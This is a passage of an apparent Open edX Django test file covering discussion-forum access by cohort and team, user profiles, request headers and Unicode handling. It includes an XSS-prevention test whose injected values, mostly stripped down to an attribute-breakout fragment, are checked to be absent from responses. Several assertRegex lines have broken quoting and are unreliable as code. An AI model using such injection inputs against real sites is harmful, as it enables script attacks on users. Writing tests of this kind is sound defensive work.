{\"ENABLE_DISCUSSION_SERVICE\": True})\n def setUp(self):\n super().setUp()\n\n def assert_can_access(self, user, discussion_id, thread_id, should_have_access):\n \"\"\"\n Verify that a user has access to a thread within a given\n discussion_id when should_have_access is True, otherwise\n verify that the user does not have access to that thread.\n \"\"\"\n def call_single_thread():\n self.client.login(username=user.username, password=self.TEST_PASSWORD)\n return self.client.get(\n reverse('single_thread', args=[str(self.course.id), discussion_id, thread_id])\n )\n\n if should_have_access:\n assert call_single_thread().status_code == 200\n else:\n assert call_single_thread().status_code == 404\n\n def test_staff_user(self, mock_request):\n \"\"\"\n Verify that the staff user can access threads in the alpha,\n beta, and global discussion blocks.\n \"\"\"\n thread_id = \"test_thread_id\"\n mock_request.side_effect = make_mock_request_impl(course=self.course, text=\"dummy content\", thread_id=thread_id)\n\n for discussion_xblock in [self.alpha_block, self.beta_block, self.global_block]:\n self.assert_can_access(self.staff_user, discussion_xblock.discussion_id, thread_id, True)\n\n def test_alpha_user(self, mock_request):\n \"\"\"\n Verify that the alpha user can access threads in the alpha and\n global discussion blocks.\n \"\"\"\n thread_id = \"test_thread_id\"\n mock_request.side_effect = make_mock_request_impl(course=self.course, text=\"dummy content\", thread_id=thread_id)\n\n for discussion_xblock in [self.alpha_block, self.global_block]:\n self.assert_can_access(self.alpha_user, discussion_xblock.discussion_id, thread_id, True)\n\n self.assert_can_access(self.alpha_user, self.beta_block.discussion_id, thread_id, False)\n\n def test_beta_user(self, mock_request):\n \"\"\"\n Verify that the beta user can access threads in the beta and\n global discussion blocks.\n \"\"\"\n thread_id = \"test_thread_id\"\n mock_request.side_effect = make_mock_request_impl(course=self.course, text=\"dummy content\", thread_id=thread_id)\n\n for discussion_xblock in [self.beta_block, self.global_block]:\n self.assert_can_access(self.beta_user, discussion_xblock.discussion_id, thread_id, True)\n\n self.assert_can_access(self.beta_user, self.alpha_block.discussion_id, thread_id, False)\n\n def test_non_cohorted_user(self, mock_request):\n \"\"\"\n Verify that the non-cohorted user can access threads in just the\n global discussion blocks.\n \"\"\"\n thread_id = \"test_thread_id\"\n mock_request.side_effect = make_mock_request_impl(course=self.course, text=\"dummy content\", thread_id=thread_id)\n\n self.assert_can_access(self.non_cohorted_user, self.global_block.discussion_id, thread_id, True)\n\n self.assert_can_access(self.non_cohorted_user, self.alpha_block.discussion_id, thread_id, False)\n\n self.assert_can_access(self.non_cohorted_user, self.beta_block.discussion_id, thread_id, False)\n\n def test_course_context_respected(self, mock_request):\n \"\"\"\n Verify that course threads go through discussion_category_id_access method.\n \"\"\"\n thread_id = \"test_thread_id\"\n mock_request.side_effect = make_mock_request_impl(\n course=self.course, text=\"dummy content\", thread_id=thread_id\n )\n\n # Beta user does not have access to alpha_block.\n self.assert_can_access(self.beta_user, self.alpha_block.discussion_id, thread_id, False)\n\n def test_standalone_context_respected(self, mock_request):\n \"\"\"\n Verify that standalone threads don't go through discussion_category_id_access method.\n \"\"\"\n # For this rather pathological test, we are assigning the alpha block discussion_id (commentable_id)\n # to a team so that we can verify that standalone threads don't go through discussion_category_id_access.\n thread_id = \"test_thread_id\"\n CourseTeamFactory(\n name=\"A team\",\n course_id=self.course.id,\n topic_id='topic_id',\n discussion_topic_id=self.alpha_block.discussion_id\n )\n mock_request.side_effect = make_mock_request_impl(\n course=self.course, text=\"dummy content\", thread_id=thread_id,\n commentable_id=self.alpha_block.discussion_id\n )\n\n # If a thread returns context other than \"course\", the access check is not done, and the beta user\n # can see the alpha discussion block.\n self.assert_can_access(self.beta_user, self.alpha_block.discussion_id, thread_id, True)\n\n\n@patch('openedx.core.djangoapps.django_comment_common.comment_client.utils.requests.request', autospec=True)\nclass InlineDiscussionContextTestCase(ForumsEnableMixin, ModuleStoreTestCase): # lint-amnesty, pylint: disable=missing-class-docstring\n\n def setUp(self):\n super().setUp()\n self.course = CourseFactory.create()\n CourseEnrollmentFactory(user=self.user, course_id=self.course.id)\n self.discussion_topic_id = \"dummy_topic\"\n self.team = CourseTeamFactory(\n name=\"A team\",\n course_id=self.course.id,\n topic_id='topic_id',\n discussion_topic_id=self.discussion_topic_id\n )\n\n self.team.add_user(self.user)\n self.user_not_in_team = UserFactory.create()\n\n def test_context_can_be_standalone(self, mock_request):\n mock_request.side_effect = make_mock_request_impl(\n course=self.course,\n text=\"dummy text\",\n commentable_id=self.discussion_topic_id\n )\n\n request = RequestFactory().get(\"dummy_url\")\n request.user = self.user\n\n response = views.inline_discussion(\n request,\n str(self.course.id),\n self.discussion_topic_id,\n )\n\n json_response = json.loads(response.content.decode('utf-8'))\n assert json_response['discussion_data'][0]['context'] == ThreadContext.STANDALONE\n\n def test_private_team_discussion(self, mock_request):\n # First set the team discussion to be private\n CourseEnrollmentFactory(user=self.user_not_in_team, course_id=self.course.id)\n request = RequestFactory().get(\"dummy_url\")\n request.user = self.user_not_in_team\n\n mock_request.side_effect = make_mock_request_impl(\n course=self.course,\n text=\"dummy text\",\n commentable_id=self.discussion_topic_id\n )\n\n with patch('lms.djangoapps.teams.api.is_team_discussion_private', autospec=True) as mocked:\n mocked.return_value = True\n response = views.inline_discussion(\n request,\n str(self.course.id),\n self.discussion_topic_id,\n )\n assert response.status_code == 403\n assert response.content.decode('utf-8') == views.TEAM_PERMISSION_MESSAGE\n\n\n@patch('openedx.core.djangoapps.django_comment_common.comment_client.utils.requests.request', autospec=True)\nclass InlineDiscussionGroupIdTestCase( # lint-amnesty, pylint: disable=missing-class-docstring\n CohortedTestCase,\n CohortedTopicGroupIdTestMixin,\n NonCohortedTopicGroupIdTestMixin\n):\n cs_endpoint = \"/threads\"\n\n def setUp(self):\n super().setUp()\n self.cohorted_commentable_id = 'cohorted_topic'\n\n def call_view(self, mock_request, commentable_id, user, group_id, pass_group_id=True):\n kwargs = {'commentable_id': self.cohorted_commentable_id}\n if group_id:\n # avoid causing a server error when the LMS chokes attempting\n # to find a group name for the group_id, when we're testing with\n # an invalid one.\n try:\n CourseUserGroup.objects.get(id=group_id)\n kwargs['group_id'] = group_id\n except CourseUserGroup.DoesNotExist:\n pass\n mock_request.side_effect = make_mock_request_impl(self.course, \"dummy content\", **kwargs)\n\n request_data = {}\n if pass_group_id:\n request_data[\"group_id\"] = group_id\n request = RequestFactory().get(\n \"dummy_url\",\n data=request_data\n )\n request.user = user\n return views.inline_discussion(\n request,\n str(self.course.id),\n commentable_id\n )\n\n def test_group_info_in_ajax_response(self, mock_request):\n response = self.call_view(\n mock_request,\n self.cohorted_commentable_id,\n self.student,\n self.student_cohort.id\n )\n self._assert_json_response_contains_group_info(\n response, lambda d: d['discussion_data'][0]\n )\n\n\n@patch('openedx.core.djangoapps.django_comment_common.comment_client.utils.requests.request', autospec=True)\nclass ForumFormDiscussionGroupIdTestCase(CohortedTestCase, CohortedTopicGroupIdTestMixin): # lint-amnesty, pylint: disable=missing-class-docstring\n cs_endpoint = \"/threads\"\n\n def call_view(self, mock_request, commentable_id, user, group_id, pass_group_id=True, is_ajax=False): # pylint: disable=arguments-differ\n kwargs = {}\n if group_id:\n kwargs['group_id'] = group_id\n mock_request.side_effect = make_mock_request_impl(self.course, \"dummy content\", **kwargs)\n\n request_data = {}\n if pass_group_id:\n request_data[\"group_id\"] = group_id\n headers = {}\n if is_ajax:\n headers['HTTP_X_REQUESTED_WITH'] = \"XMLHttpRequest\"\n\n self.client.login(username=user.username, password=self.TEST_PASSWORD)\n return self.client.get(\n reverse(\"forum_form_discussion\", args=[str(self.course.id)]),\n data=request_data,\n **headers\n )\n\n def test_group_info_in_html_response(self, mock_request):\n response = self.call_view(\n mock_request,\n \"cohorted_topic\",\n self.student,\n self.student_cohort.id\n )\n self._assert_html_response_contains_group_info(response)\n\n def test_group_info_in_ajax_response(self, mock_request):\n response = self.call_view(\n mock_request,\n \"cohorted_topic\",\n self.student,\n self.student_cohort.id,\n is_ajax=True\n )\n self._assert_json_response_contains_group_info(\n response, lambda d: d['discussion_data'][0]\n )\n\n\n@patch('openedx.core.djangoapps.django_comment_common.comment_client.utils.requests.request', autospec=True)\nclass UserProfileDiscussionGroupIdTestCase(CohortedTestCase, CohortedTopicGroupIdTestMixin): # lint-amnesty, pylint: disable=missing-class-docstring\n cs_endpoint = \"/active_threads\"\n\n def call_view_for_profiled_user(\n self, mock_request, requesting_user, profiled_user, group_id, pass_group_id, is_ajax=False\n ):\n \"\"\"\n Calls \"user_profile\" view method on behalf of \"requesting_user\" to get information about\n the user \"profiled_user\".\n \"\"\"\n kwargs = {}\n if group_id:\n kwargs['group_id'] = group_id\n mock_request.side_effect = make_mock_request_impl(self.course, \"dummy content\", **kwargs)\n\n request_data = {}\n if pass_group_id:\n request_data[\"group_id\"] = group_id\n headers = {}\n if is_ajax:\n headers['HTTP_X_REQUESTED_WITH'] = \"XMLHttpRequest\"\n\n self.client.login(username=requesting_user.username, password=self.TEST_PASSWORD)\n return self.client.get(\n reverse('user_profile', args=[str(self.course.id), profiled_user.id]),\n data=request_data,\n **headers\n )\n\n def call_view(self, mock_request, _commentable_id, user, group_id, pass_group_id=True, is_ajax=False): # pylint: disable=arguments-differ\n return self.call_view_for_profiled_user(\n mock_request, user, user, group_id, pass_group_id=pass_group_id, is_ajax=is_ajax\n )\n\n def test_group_info_in_html_response(self, mock_request):\n response = self.call_view(\n mock_request,\n \"cohorted_topic\",\n self.student,\n self.student_cohort.id,\n is_ajax=False\n )\n self._assert_html_response_contains_group_info(response)\n\n def test_group_info_in_ajax_response(self, mock_request):\n response = self.call_view(\n mock_request,\n \"cohorted_topic\",\n self.student,\n self.student_cohort.id,\n is_ajax=True\n )\n self._assert_json_response_contains_group_info(\n response, lambda d: d['discussion_data'][0]\n )\n\n def _test_group_id_passed_to_user_profile(\n self, mock_request, expect_group_id_in_request, requesting_user, profiled_user, group_id, pass_group_id\n ):\n \"\"\"\n Helper method for testing whether or not group_id was passed to the user_profile request.\n \"\"\"\n\n def get_params_from_user_info_call(for_specific_course):\n \"\"\"\n Returns the request parameters for the user info call with either course_id specified or not,\n depending on value of 'for_specific_course'.\n \"\"\"\n # There will be 3 calls from user_profile. One has the cs_endpoint \"active_threads\", and it is already\n # tested. The other 2 calls are for user info; one of those calls is for general information about the user,\n # and it does not specify a course_id. The other call does specify a course_id, and if the caller did not\n # have discussion moderator privileges, it should also contain a group_id.\n for r_call in mock_request.call_args_list:\n if not r_call[0][1].endswith(self.cs_endpoint):\n params = r_call[1][\"params\"]\n has_course_id = \"course_id\" in params\n if (for_specific_course and has_course_id) or (not for_specific_course and not has_course_id):\n return params\n pytest.fail(\"Did not find appropriate user_profile call for 'for_specific_course'=\" + for_specific_course)\n\n mock_request.reset_mock()\n self.call_view_for_profiled_user(\n mock_request,\n requesting_user,\n profiled_user,\n group_id,\n pass_group_id=pass_group_id,\n is_ajax=False\n )\n # Should never have a group_id if course_id was not included in the request.\n params_without_course_id = get_params_from_user_info_call(False)\n assert 'group_id' not in params_without_course_id\n\n params_with_course_id = get_params_from_user_info_call(True)\n if expect_group_id_in_request:\n assert 'group_id' in params_with_course_id\n assert group_id == params_with_course_id['group_id']\n else:\n assert 'group_id' not in params_with_course_id\n\n def test_group_id_passed_to_user_profile_student(self, mock_request):\n \"\"\"\n Test that the group id is always included when requesting user profile information for a particular\n course if the requester does not have discussion moderation privileges.\n \"\"\"\n def verify_group_id_always_present(profiled_user, pass_group_id):\n \"\"\"\n Helper method to verify that group_id is always present for student in course\n (non-privileged user).\n \"\"\"\n self._test_group_id_passed_to_user_profile(\n mock_request, True, self.student, profiled_user, self.student_cohort.id, pass_group_id\n )\n\n # In all these test cases, the requesting_user is the student (non-privileged user).\n # The profile returned on behalf of the student is for the profiled_user.\n verify_group_id_always_present(profiled_user=self.student, pass_group_id=True)\n verify_group_id_always_present(profiled_user=self.student, pass_group_id=False)\n verify_group_id_always_present(profiled_user=self.moderator, pass_group_id=True)\n verify_group_id_always_present(profiled_user=self.moderator, pass_group_id=False)\n\n def test_group_id_user_profile_moderator(self, mock_request):\n \"\"\"\n Test that the group id is only included when a privileged user requests user profile information for a\n particular course and user if the group_id is explicitly passed in.\n \"\"\"\n def verify_group_id_present(profiled_user, pass_group_id, requested_cohort=self.moderator_cohort):\n \"\"\"\n Helper method to verify that group_id is present.\n \"\"\"\n self._test_group_id_passed_to_user_profile(\n mock_request, True, self.moderator, profiled_user, requested_cohort.id, pass_group_id\n )\n\n def verify_group_id_not_present(profiled_user, pass_group_id, requested_cohort=self.moderator_cohort):\n \"\"\"\n Helper method to verify that group_id is not present.\n \"\"\"\n self._test_group_id_passed_to_user_profile(\n mock_request, False, self.moderator, profiled_user, requested_cohort.id, pass_group_id\n )\n\n # In all these test cases, the requesting_user is the moderator (privileged user).\n\n # If the group_id is explicitly passed, it will be present in the request.\n verify_group_id_present(profiled_user=self.student, pass_group_id=True)\n verify_group_id_present(profiled_user=self.moderator, pass_group_id=True)\n verify_group_id_present(\n profiled_user=self.student, pass_group_id=True, requested_cohort=self.student_cohort\n )\n\n # If the group_id is not explicitly passed, it will not be present because the requesting_user\n # has discussion moderator privileges.\n verify_group_id_not_present(profiled_user=self.student, pass_group_id=False)\n verify_group_id_not_present(profiled_user=self.moderator, pass_group_id=False)\n\n\n@patch('openedx.core.djangoapps.django_comment_common.comment_client.utils.requests.request', autospec=True)\nclass FollowedThreadsDiscussionGroupIdTestCase(CohortedTestCase, CohortedTopicGroupIdTestMixin): # lint-amnesty, pylint: disable=missing-class-docstring\n cs_endpoint = \"/subscribed_threads\"\n\n def call_view(self, mock_request, commentable_id, user, group_id, pass_group_id=True):\n kwargs = {}\n if group_id:\n kwargs['group_id'] = group_id\n mock_request.side_effect = make_mock_request_impl(self.course, \"dummy content\", **kwargs)\n\n request_data = {}\n if pass_group_id:\n request_data[\"group_id\"] = group_id\n request = RequestFactory().get(\n \"dummy_url\",\n data=request_data,\n HTTP_X_REQUESTED_WITH=\"XMLHttpRequest\"\n )\n request.user = user\n return views.followed_threads(\n request,\n str(self.course.id),\n user.id\n )\n\n def test_group_info_in_ajax_response(self, mock_request):\n response = self.call_view(\n mock_request,\n \"cohorted_topic\",\n self.student,\n self.student_cohort.id\n )\n self._assert_json_response_contains_group_info(\n response, lambda d: d['discussion_data'][0]\n )\n\n\n@patch('openedx.core.djangoapps.django_comment_common.comment_client.utils.requests.request', autospec=True)\nclass InlineDiscussionTestCase(ForumsEnableMixin, ModuleStoreTestCase): # lint-amnesty, pylint: disable=missing-class-docstring\n\n def setUp(self):\n super().setUp()\n\n self.course = CourseFactory.create(\n org=\"TestX\",\n number=\"101\",\n display_name=\"Test Course\",\n teams_configuration=TeamsConfig({\n 'topics': [{\n 'id': 'topic_id',\n 'name': 'A topic',\n 'description': 'A topic',\n }]\n })\n )\n self.student = UserFactory.create()\n CourseEnrollmentFactory(user=self.student, course_id=self.course.id)\n self.discussion1 = BlockFactory.create(\n parent_location=self.course.location,\n category=\"discussion\",\n discussion_id=\"discussion1\",\n display_name='Discussion1',\n discussion_category=\"Chapter\",\n discussion_target=\"Discussion1\"\n )\n\n def send_request(self, mock_request, params=None):\n \"\"\"\n Creates and returns a request with params set, and configures\n mock_request to return appropriate values.\n \"\"\"\n request = RequestFactory().get(\"dummy_url\", params if params else {})\n request.user = self.student\n mock_request.side_effect = make_mock_request_impl(\n course=self.course, text=\"dummy content\", commentable_id=self.discussion1.discussion_id\n )\n return views.inline_discussion(\n request, str(self.course.id), self.discussion1.discussion_id\n )\n\n def test_context(self, mock_request):\n team = CourseTeamFactory(\n name='Team Name',\n topic_id='topic_id',\n course_id=self.course.id,\n discussion_topic_id=self.discussion1.discussion_id\n )\n\n team.add_user(self.student)\n\n self.send_request(mock_request)\n assert mock_request.call_args[1]['params']['context'] == ThreadContext.STANDALONE\n\n\n@patch('requests.request', autospec=True)\nclass UserProfileTestCase(ForumsEnableMixin, UrlResetMixin, ModuleStoreTestCase): # lint-amnesty, pylint: disable=missing-class-docstring\n\n TEST_THREAD_TEXT = 'userprofile-test-text'\n TEST_THREAD_ID = 'userprofile-test-thread-id'\n\n @patch.dict(\"django.conf.settings.FEATURES\", {\"ENABLE_DISCUSSION_SERVICE\": True})\n def setUp(self):\n super().setUp()\n\n self.course = CourseFactory.create()\n self.student = UserFactory.create()\n self.profiled_user = UserFactory.create()\n CourseEnrollmentFactory.create(user=self.student, course_id=self.course.id)\n CourseEnrollmentFactory.create(user=self.profiled_user, course_id=self.course.id)\n\n def get_response(self, mock_request, params, **headers): # lint-amnesty, pylint: disable=missing-function-docstring\n mock_request.side_effect = make_mock_request_impl(\n course=self.course, text=self.TEST_THREAD_TEXT, thread_id=self.TEST_THREAD_ID\n )\n self.client.login(username=self.student.username, password=self.TEST_PASSWORD)\n\n response = self.client.get(\n reverse('user_profile', kwargs={\n 'course_id': str(self.course.id),\n 'user_id': self.profiled_user.id,\n }),\n data=params,\n **headers\n )\n mock_request.assert_any_call(\n \"get\",\n StringEndsWithMatcher(f'/users/{self.profiled_user.id}/active_threads'),\n data=None,\n params=PartialDictMatcher({\n \"course_id\": str(self.course.id),\n \"page\": params.get(\"page\", 1),\n \"per_page\": views.THREADS_PER_PAGE\n }),\n headers=ANY,\n timeout=ANY\n )\n return response\n\n def check_html(self, mock_request, **params): # lint-amnesty, pylint: disable=missing-function-docstring\n response = self.get_response(mock_request, params)\n assert response.status_code == 200\n assert response['Content-Type'] == 'text/html; charset=utf-8'\n html = response.content.decode('utf-8')\n self.assertRegex(html, r'data-page=\"1\"')\n self.assertRegex(html, r'data-num-pages=\"1\"')\n self.assertRegex(html, r'1 discussion started')\n self.assertRegex(html, r'2 comments')\n self.assertRegex(html, f''id': '{self.TEST_THREAD_ID}'')\n self.assertRegex(html, f''title': '{self.TEST_THREAD_TEXT}'')\n self.assertRegex(html, f''body': '{self.TEST_THREAD_TEXT}'')\n self.assertRegex(html, f''username': '{self.student.username}'')\n\n def check_ajax(self, mock_request, **params): # lint-amnesty, pylint: disable=missing-function-docstring\n response = self.get_response(mock_request, params, HTTP_X_REQUESTED_WITH=\"XMLHttpRequest\")\n assert response.status_code == 200\n assert response['Content-Type'] == 'application/json; charset=utf-8'\n response_data = json.loads(response.content.decode('utf-8'))\n assert sorted(response_data.keys()) == ['annotated_content_info', 'discussion_data', 'num_pages', 'page']\n assert len(response_data['discussion_data']) == 1\n assert response_data['page'] == 1\n assert response_data['num_pages'] == 1\n assert response_data['discussion_data'][0]['id'] == self.TEST_THREAD_ID\n assert response_data['discussion_data'][0]['title'] == self.TEST_THREAD_TEXT\n assert response_data['discussion_data'][0]['body'] == self.TEST_THREAD_TEXT\n\n def test_html(self, mock_request):\n self.check_html(mock_request)\n\n def test_ajax(self, mock_request):\n self.check_ajax(mock_request)\n\n def test_404_non_enrolled_user(self, __):\n \"\"\"\n Test that when student try to visit un-enrolled students' discussion profile,\n the system raises Http404.\n \"\"\"\n unenrolled_user = UserFactory.create()\n request = RequestFactory().get(\"dummy_url\")\n request.user = self.student\n with pytest.raises(Http404):\n views.user_profile(\n request,\n str(self.course.id),\n unenrolled_user.id\n )\n\n def test_404_profiled_user(self, _mock_request):\n request = RequestFactory().get(\"dummy_url\")\n request.user = self.student\n with pytest.raises(Http404):\n views.user_profile(\n request,\n str(self.course.id),\n -999\n )\n\n def test_404_course(self, _mock_request):\n request = RequestFactory().get(\"dummy_url\")\n request.user = self.student\n with pytest.raises(Http404):\n views.user_profile(\n request,\n \"non/existent/course\",\n self.profiled_user.id\n )\n\n def test_post(self, mock_request):\n mock_request.side_effect = make_mock_request_impl(\n course=self.course, text=self.TEST_THREAD_TEXT, thread_id=self.TEST_THREAD_ID\n )\n request = RequestFactory().post(\"dummy_url\")\n request.user = self.student\n response = views.user_profile(\n request,\n str(self.course.id),\n self.profiled_user.id\n )\n assert response.status_code == 405\n\n\n@patch('requests.request', autospec=True)\nclass CommentsServiceRequestHeadersTestCase(ForumsEnableMixin, UrlResetMixin, ModuleStoreTestCase): # lint-amnesty, pylint: disable=missing-class-docstring\n\n CREATE_USER = False\n\n @patch.dict(\"django.conf.settings.FEATURES\", {\"ENABLE_DISCUSSION_SERVICE\": True})\n def setUp(self):\n super().setUp()\n\n username = \"foo\"\n password = \"bar\"\n\n # Invoke UrlResetMixin\n super().setUp()\n self.course = CourseFactory.create(discussion_topics={'dummy discussion': {'id': 'dummy_discussion_id'}})\n self.student = UserFactory.create(username=username, password=password)\n CourseEnrollmentFactory.create(user=self.student, course_id=self.course.id)\n assert self.client.login(username=username, password=password)\n\n self.addCleanup(translation.deactivate)\n\n def assert_all_calls_have_header(self, mock_request, key, value): # lint-amnesty, pylint: disable=missing-function-docstring\n expected = call(\n ANY, # method\n ANY, # url\n data=ANY,\n params=ANY,\n headers=PartialDictMatcher({key: value}),\n timeout=ANY\n )\n for actual in mock_request.call_args_list:\n assert expected == actual\n\n def test_accept_language(self, mock_request):\n lang = \"eo\"\n text = \"dummy content\"\n thread_id = \"test_thread_id\"\n mock_request.side_effect = make_mock_request_impl(course=self.course, text=text, thread_id=thread_id)\n\n self.client.get(\n reverse(\n \"single_thread\",\n kwargs={\n \"course_id\": str(self.course.id),\n \"discussion_id\": \"dummy_discussion_id\",\n \"thread_id\": thread_id,\n }\n ),\n HTTP_ACCEPT_LANGUAGE=lang,\n )\n self.assert_all_calls_have_header(mock_request, \"Accept-Language\", lang)\n\n @override_settings(COMMENTS_SERVICE_KEY=\"test_api_key\")\n def test_api_key(self, mock_request):\n mock_request.side_effect = make_mock_request_impl(course=self.course, text=\"dummy\", thread_id=\"dummy\")\n\n self.client.get(\n reverse(\n \"forum_form_discussion\",\n kwargs={\"course_id\": str(self.course.id)}\n ),\n )\n self.assert_all_calls_have_header(mock_request, \"X-Edx-Api-Key\", \"test_api_key\")\n\n\nclass InlineDiscussionUnicodeTestCase(ForumsEnableMixin, SharedModuleStoreTestCase, UnicodeTestMixin): # lint-amnesty, pylint: disable=missing-class-docstring\n\n @classmethod\n def setUpClass(cls):\n # pylint: disable=super-method-not-called\n with super().setUpClassAndTestData():\n cls.course = CourseFactory.create()\n\n @classmethod\n def setUpTestData(cls):\n super().setUpTestData()\n\n cls.student = UserFactory.create()\n CourseEnrollmentFactory(user=cls.student, course_id=cls.course.id)\n\n @patch('openedx.core.djangoapps.django_comment_common.comment_client.utils.requests.request', autospec=True)\n def _test_unicode_data(self, text, mock_request): # lint-amnesty, pylint: disable=missing-function-docstring\n mock_request.side_effect = make_mock_request_impl(course=self.course, text=text)\n request = RequestFactory().get(\"dummy_url\")\n request.user = self.student\n\n response = views.inline_discussion(\n request, str(self.course.id), self.course.discussion_topics['General']['id']\n )\n assert response.status_code == 200\n response_data = json.loads(response.content.decode('utf-8'))\n assert response_data['discussion_data'][0]['title'] == text\n assert response_data['discussion_data'][0]['body'] == text\n\n\nclass ForumFormDiscussionUnicodeTestCase(ForumsEnableMixin, SharedModuleStoreTestCase, UnicodeTestMixin): # lint-amnesty, pylint: disable=missing-class-docstring\n\n @classmethod\n def setUpClass(cls):\n # pylint: disable=super-method-not-called\n with super().setUpClassAndTestData():\n cls.course = CourseFactory.create()\n\n @classmethod\n def setUpTestData(cls):\n super().setUpTestData()\n\n cls.student = UserFactory.create()\n CourseEnrollmentFactory(user=cls.student, course_id=cls.course.id)\n\n @patch('openedx.core.djangoapps.django_comment_common.comment_client.utils.requests.request', autospec=True)\n def _test_unicode_data(self, text, mock_request): # lint-amnesty, pylint: disable=missing-function-docstring\n mock_request.side_effect = make_mock_request_impl(course=self.course, text=text)\n request = RequestFactory().get(\"dummy_url\")\n request.user = self.student\n # so (request.headers.get('x-requested-with') == 'XMLHttpRequest') == True\n request.META[\"HTTP_X_REQUESTED_WITH\"] = \"XMLHttpRequest\"\n\n response = views.forum_form_discussion(request, str(self.course.id))\n assert response.status_code == 200\n response_data = json.loads(response.content.decode('utf-8'))\n assert response_data['discussion_data'][0]['title'] == text\n assert response_data['discussion_data'][0]['body'] == text\n\n\n@ddt.ddt\n@patch('openedx.core.djangoapps.django_comment_common.comment_client.utils.requests.request', autospec=True)\nclass ForumDiscussionXSSTestCase(ForumsEnableMixin, UrlResetMixin, ModuleStoreTestCase): # lint-amnesty, pylint: disable=missing-class-docstring\n\n @patch.dict(\"django.conf.settings.FEATURES\", {\"ENABLE_DISCUSSION_SERVICE\": True})\n def setUp(self):\n super().setUp()\n\n username = \"foo\"\n password = \"bar\"\n\n self.course = CourseFactory.create()\n self.student = UserFactory.create(username=username, password=password)\n CourseEnrollmentFactory.create(user=self.student, course_id=self.course.id)\n assert self.client.login(username=username, password=password)\n\n @ddt.data('\">', '', '')\n @patch('common.djangoapps.student.models.user.cc.User.from_django_user')\n def test_forum_discussion_xss_prevent(self, malicious_code, mock_user, mock_req):\n \"\"\"\n Test that XSS attack is prevented\n \"\"\"\n mock_user.return_value.to_dict.return_value = {}\n mock_req.return_value.status_code = 200\n reverse_url = \"{}{}\".format(reverse(\n \"forum_form_discussion\",\n kwargs={\"course_id\": str(self.course.id)}), '/forum_form_discussion')\n # Test that malicious code does not appear in html\n url = \"{}?{}={}\".format(reverse_url, 'sort_key', malicious_code)\n resp = self.client.get(url)\n self.assertNotContains(resp, malicious_code)\n\n @ddt.data('\">', '', '')\n @patch('common.djangoapps.student.models.user.cc.User.from_django_user')\n @patch('common.djangoapps.student.models.user.cc.User.active_threads')\n def test_forum_user_profile_xss_prevent(self, malicious_code, mock_threads, mock_from_django_user, mock_request):\n \"\"\"\n Test that XSS attack is prevented\n \"\"\"\n mock_threads.return_value = [], 1, 1\n mock_from_django_user.return_value.to_dict.return_value = {\n 'upvoted_ids': [],\n 'downvoted_ids': [],\n 'subscribed_thread_ids': []\n }\n mock_request.side_effect = make_mock_request_impl(course=self.course, text='dummy')\n\n url = reverse('user_profile',\n kwargs={'course_id': str(self.course.id), 'user_id': str(self.student.id)})\n # Test that malicious code does not appear in html\n url_string = \"{}?{}={}\".format(url, 'page', malicious_code)\n resp = self.client.get(url_string)\n self.assertNotContains(resp, malicious_code)\n\n\nclass ForumDiscussionSearchUnicodeTestCase(ForumsEnableMixin, SharedModuleStoreTestCase, UnicodeTestMixin): # lint-amnesty, pylint: disable=missing-class-docstring\n\n @classmethod\n def setUpClass(cls):\n # pylint: disable=super-method-not-called\n with super().setUpClassAndTestData():\n cls.course = CourseFactory.create()\n\n @classmethod\n def setUpTestData(cls):\n super().setUpTestData()\n\n cls.student = UserFactory.create()\n CourseEnrollmentFactory(user=cls.student, course_id=cls.course.id)\n\n @patch('openedx.core.djangoapps.django_comment_common.comment_client.utils.requests.request', autospec=True)\n def _test_unicode_data(self, text, mock_request): # lint-amnesty, pylint: disable=missing-function-docstring\n mock_request.side_effect = make_mock_request_impl(course=self.course, text=text)\n data = {\n \"ajax\": 1,\n \"text\": text,\n }\n request = RequestFactory().get(\"dummy_url\", data)\n request.user = self.student\n # so (request.headers.get('x-requested-with') == 'XMLHttpRequest') == True\n request.META[\"HTTP_X_REQUESTED_WITH\"] = \"XMLHttpRequest\"\n\n response = views.forum_form_discussion(request, str(self.course.id))\n assert response.status_code == 200\n response_data = json.loads(response.content.decode('utf-8'))\n assert response_data['discussion_data'][0]['title'] == text\n assert response_data['discussion_data'][0]['body'] == text\n\n\nclass SingleThreadUnicodeTestCase(ForumsEnableMixin, SharedModuleStoreTestCase, UnicodeTestMixin): # lint-amnesty, pylint: disable=missing-class-docstring\n\n @classmethod\n def setUpClass(cls):\n # pylint: disable=super-method-not-called\n with super().setUpClassAndTestData():\n cls.course = CourseFactory.create(discussion_topics={'dummy_discussion_id': {'id': 'dummy_discussion_id'}})\n\n @classmethod\n def setUpTestData(cls):\n super().setUpTestData()\n\n cls.student = UserFactory.create()\n CourseEnrollmentFactory(user=cls.student, course_id=cls.course.id)\n\n @patch('openedx.core.djangoapps.django_comment_common.comment_client.utils.requests.request', autospec=True)\n def _test_unicode_data(self, text, mock_request): # lint-amnesty, pylint: disable=missing-function-docstring\n thread_id = \"test_thread_id\"\n mock_request.side_effect = make_mock_request_impl(course=self.course, text=text, thread_id=thread_id)\n request = RequestFactory().get(\"dummy_url\")\n request.user = self.student\n # so (request.headers.get('x-requested-with') == 'XMLHttpRequest') == True\n request.META[\"HTTP_X_REQUESTED_WITH\"] = \"XMLHttpRequest\"\n\n response = views.single_thread(request, str(self.course.id), \"dummy_discussion_id\", thread_id)\n assert response.status_code == 200\n response_data = json.loads(response.content.decode('utf-8'))\n assert response_data['content']['title'] == text\n assert response_data['content']['body'] == text\n\n\nclass UserProfileUnicodeTestCase(ForumsEnableMixin, SharedModuleStoreTestCase, UnicodeTestMixin): # lint-amnesty, pylint: disable=missing-class-docstring\n\n @classmethod\n def setUpClass(cls):\n # pylint: disable=super-method-not-called\n with super().setUpClassAndTestData():\n cls.course = CourseFactory.create()\n\n @classmethod\n def setUpTestData(cls):\n super().setUpTestData()\n\n cls.student = UserFactory.create()\n CourseEnrollmentFactory(user=cls.student, course_id=cls.course.id)\n\n @patch('openedx.core.djangoapps.django_comment_common.comment_client.utils.requests.request', autospec=True)\n def _test_unicode_data(self, text, mock_request): # lint-amnesty, pylint: disable=missing-function-docstring\n mock_request.side_effect = make_mock_request_impl(course=self.course, text=text)\n request = RequestFactory().get(\"dummy_url\")\n request.user = self.student\n # so (request.headers.get('x-requested-with') == 'XMLHttpRequest') == True\n request.META[\"HTTP_X_REQUESTED_WITH\"] = \"XMLHttpRequest\"\n\n response = views.user_profile(request, str(self.course.id), str(self.student.id))\n assert response.status_code == 200\n response_data = json.loads(response.content.decode('utf-8'))\n assert response_data['discussion_data'][0]['title'] == text\n assert response_data['discussion_data'][0]['body'] == text\n\n\nclass FollowedThreadsUnicodeTestCase(ForumsEnableMixin, SharedModuleStoreTestCase, UnicodeTestMixin): # lint-amnesty, 